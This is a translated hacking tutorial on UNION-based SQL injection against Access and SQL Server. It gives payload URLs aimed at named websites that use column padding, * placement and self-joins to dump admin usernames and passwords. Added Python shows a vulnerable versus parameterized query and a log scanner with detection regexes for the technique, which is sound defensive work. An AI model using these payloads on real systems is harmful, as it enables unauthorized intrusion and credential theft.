Getting database data out of Access, SQL Server, etc.
PH4NT0M Security Team, http://www.ph4nt0m.org
When SQL-injecting Access you often run into passwords that are Chinese, or have to guess the name of the key field. This technique solves such problems quickly. It has two minimum requirements:
1. The target system uses an Access database and has a SQL injection vulnerability; the MSSQL database also supports this technique.
2. You need to know the name of the table whose data you want to dump, and one field name in that table, usually the ID field.
The obvious advantages of this technique are:
1. You may not need the single-quote character, so filtering of quotes does not affect this technique.
2. You get the content of sensitive data quickly, without the slow character-by-character guessing that previously broke on Chinese text, special characters and so on.
3. When SQL Server's error messages are blocked, you can still obtain sensitive data, even though the error-message method no longer works.
4. You can still obtain the data without knowing the name of the key (desired) field.
This technique may sound hard to grasp, but it is actually very simple. There are two difficult points: the first is easy to work out by looking at the results, while the second is a bit more trouble.
First look at the form of a UNION statement, since this is the main principle behind dumping data. As shown below:
When we insert a UNION statement through SQL injection, as long as the two SELECT queries return the same number of columns, the result of the whole SQL statement becomes the union of the two result sets. That is how we can dump the data we need. Look at a simple example:
Http://www.chinj.com/softview.asp?softid=3903 Union Select USERNAME, Password, 1,1,1,10020from Admin
This server has the return of error messages turned off, so sensitive data cannot be obtained directly with the earlier error-based method. After inserting the UNION statement through SQL injection, you can guess that the SQL statement actually executed becomes:
Select * from soft where softid = 3903 Union Select UserName, Password, 1,1,1 from admin
Where the page normally displays fields 1 and 2 of the Soft table, it now displays the UserName and Password fields of admin, and the three 1s that follow are filled into the remaining columns. Using this property we can certainly get the username and password fields from the admin_userinfo table. The constructed request is as follows:
http://www.chinj.com/softview.asp?softid=3903 Union Select USERNAME, Password, 1,1,1,11 from ADMIN_USERINFO where USERNAME <> ''
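As an added example (not part of the original article), the Python script below uses sqlite3 as a stand-in for the Access back end to show the softview.asp query in the two forms that matter to a defender: the string-concatenated query that accepts the UNION payload from above, and a parameterized query that does not. Table names, sample rows and the function names are constructed for this example; sqlite, like SQL Server, keeps * in place rather than moving it to the end as the article says Access does.

```python
import sqlite3

# Constructed sample schema: the article's soft table (id, hit, softname, softurl)
# and an admin table with the usual ID / username / password structure.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE soft(id INTEGER, hit INTEGER, softname TEXT, softurl TEXT);
        CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);
        INSERT INTO soft VALUES (3903, 17, 'demo-tool', 'http://example.invalid/demo.zip');
        INSERT INTO admin VALUES (1, 'webmaster', 'S3cret!');
    """)
    return db

def vulnerable_softview(db, softid):
    """softview.asp as the article assumes it is written: the softid parameter is
    pasted into the SQL text, so a UNION inside it becomes part of the query."""
    sql = "SELECT id, hit, softname, softurl FROM soft WHERE id = " + softid
    return db.execute(sql).fetchall()

def safe_softview(db, softid):
    """Hardened form: softid is bound as a parameter. The driver never treats it
    as SQL, so a value containing UNION simply matches no row."""
    sql = "SELECT id, hit, softname, softurl FROM soft WHERE id = ?"
    return db.execute(sql, (softid,)).fetchall()

# Payload of the form the article uses: the column count is padded with 1s so
# that username/password land in the columns the page renders (softname, softurl).
PAYLOAD = "3903 UNION SELECT 1, 1, username, password FROM admin"

def demo():
    db = make_db()
    leaked = vulnerable_softview(db, PAYLOAD)   # admin row appears as a second "soft" row
    blocked = safe_softview(db, PAYLOAD)        # no rows: '3903 UNION ...' is not an id
    try:
        # Column-count mismatch is why the padding matters: sqlite, SQL Server and
        # Access all reject a UNION whose two SELECTs return different column counts.
        vulnerable_softview(db, "3903 UNION SELECT username, password FROM admin")
        mismatch_rejected = False
    except sqlite3.OperationalError:
        mismatch_rejected = True
    return leaked, blocked, mismatch_rejected

if __name__ == "__main__":
    print(demo())
```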
The above is a simple use of UNION to obtain sensitive data without resorting to laborious brute-force guessing. To obtain data without knowing the field names, the natural idea is to use * in place of the field names. As long as the columns represented by * plus a few padding 1s add up to the same number of columns as the SELECT query in the script, data whose field names we do not know can be obtained as well.
Consider a statement such as: SELECT ID, HIT, SOFTNAME, SOFTURL from Soft where id = 10. The fields displayed normally on the web page are SoftName and SoftURL, so we have to adjust the position of * when using UNION. The usual structure of an admin table is ID, username, password, so the injected statement should be constructed as: SELECT 1, * from admin. This puts the UserName and Password fields represented by * into the SoftName and SoftURL positions, so the web page shows us the UserName and Password fields we want.

Of course this is only the simplest example. A table may have a dozen or more fields; the longest I have seen had forty-three. If the script queries with SELECT *, we then have to use 1 to 43 fields when constructing the UNION SELECT. Some fields will not be displayed by the web page, so the position of * after UNION SELECT has to be chosen with that in mind. I believe this needs no further explanation.

The syntax above works fully in SQL Server. However, Access and SQL Server differ slightly. In SQL Server, the query SELECT *, 1, 1, 1 from admin returns the record set as: * 1 1 1. In Access, the same statement returns 1 1 1 *; that is, no matter where * is placed among the 1s, the data represented by * always appears at the end of the query result. Here is a more complex example to explain this:
http://www.hnp2p.com/mov/view.asp?id=1916 Union (select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 From ADMIN)
This site uses an Access database. You can see that fields 2, 3, 7, 8, 10, 11 are displayed normally, but the later fields are not. Removing 14, 15, 16 and replacing them with * still gives a normal page, which means admin has three fields, and it is certainly the ID username password structure; but apart from the ID field, the other field names cannot be guessed. Moving the position of * the way it is done in SQL Server would dump the sensitive data there, but it does not work in Access, because Access always places the fields represented by * at the end of the query result set. The result of the Access query will always look like: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, *. To expose the fields represented by *, we have to move them to other positions. First look at this:
http://www.hnp2p.com/mov/view.asp?id=1916 Union Select 1, * From (((Admin AS A INNER Join Admin AS B on A.ID = B.ID) INNER JOIN Admin AS C on C.ID = B.ID) INNER JOIN Admin AS D on D.ID = C.ID) INNER Join Admin AS E on D.ID = E.ID
When this statement executes, the final query result has the following columns (position above, value below):

Position: 1  2     3       4      5     6       7      8     9       10     11    12      13     14    15      16
Value:    1  A.ID  A.NAME  A.PWD  B.ID  B.NAME  B.PWD  C.ID  C.Name  C.PWD  D.ID  D.Name  D.PWD  E.ID  E.NAME  E.PWD

Among them, the 3rd and 7th fields (A.NAME and B.PWD) are exactly the UserName and Password values we want. Here I used the JOIN syntax to connect the table to itself repeatedly, building a query result that meets our requirement.
JOIN comes in full joins, left joins and right joins; the specific differences can be looked up in any SQL syntax reference. Here, in Access, the join mode we choose has the same effect as a full join. Look at a simple JOIN syntax:
Select * from (Table1 INNER JOIN Table2 ON Table1.SerialNo = Table2.SerialNo) INNER JOIN Table3 ON Table1.SerialNo = Table3.SerialNo
Converted to a concrete instance:
SELECT 1, 2, 3, 4, * from ((Admin AS A INNER JOIN Admin AS B ON A.ID = B.ID) INNER JOIN Admin AS C ON C.ID = B.ID) INNER JOIN Admin AS D ON D.ID = C.ID
Following this format, you can work out the SQL statement that the URL above actually executes: it is nothing more than repeatedly using JOIN to connect the admin table to itself, then padding the required number of fields in front. Once the statement is constructed, the data whose field names you do not know is displayed in the page. This is the difficult part of the technique.
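As an added detection example (not from the original article): a Python scanner that URL-decodes query strings from constructed IIS-style log lines and flags the three markers of the technique described above: UNION SELECT, runs of numeric padding columns, and the same table joined to itself under aliases. The log lines, their field layout and the function names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (not real traffic): cs-uri-stem cs-uri-query sc-status
LOG_LINES = [
    "/softview.asp softid=3903 200",
    "/softview.asp softid=3903%20Union%20Select%20USERNAME,Password,1,1,1%20from%20Admin 200",
    "/mov/view.asp id=1916%20Union%20(select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20From%20ADMIN) 200",
    "/mov/view.asp id=1916%20Union%20Select%201,*%20From%20((Admin%20AS%20A%20INNER%20Join%20Admin"
    "%20AS%20B%20on%20A.ID=B.ID)%20INNER%20JOIN%20Admin%20AS%20C%20on%20C.ID=B.ID) 200",
    "/mov/view.asp id=1916 200",
]

# UNION followed (optionally after an opening parenthesis) by SELECT.
UNION_RE = re.compile(r"\bunion\b(?:\s*\()?\s*select\b", re.I)
# Two or more bare numeric columns right after SELECT: the padding the article relies on.
PAD_RE = re.compile(r"\bselect\s+(?:\d+\s*,\s*){2,}", re.I)
# "<table> AS x INNER JOIN <same table> AS y": the self-join used to reposition *.
SELF_JOIN_RE = re.compile(r"\b(\w+)\s+as\s+\w+\s+inner\s+join\s+\1\s+as\s+\w+\b", re.I)

def decode_query(raw):
    """Decode until stable so double-encoded (%2520) keywords are not missed."""
    prev = None
    while raw != prev:
        prev, raw = raw, unquote_plus(raw)
    return re.sub(r"\s+", " ", raw)

def classify(line):
    """Return the list of reasons a request matches the union/self-join technique."""
    stem, query, status = line.split(" ")
    q = decode_query(query)
    reasons = []
    if UNION_RE.search(q):
        reasons.append("union-select")
    if PAD_RE.search(q):
        reasons.append("numeric column padding")
    m = SELF_JOIN_RE.search(q)
    if m:
        reasons.append("self-join of " + m.group(1).lower())
    return reasons

def scan(lines):
    """(uri-stem, reasons) for every line that triggers at least one marker."""
    return [(l.split(" ")[0], classify(l)) for l in lines if classify(l)]

if __name__ == "__main__":
    for stem, reasons in scan(LOG_LINES):
        print(stem, reasons)
```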
OK, that is the whole introduction. It would also be quite possible to write this technique into a program, but it is best to use the human brain when constructing the statement ~~~ heh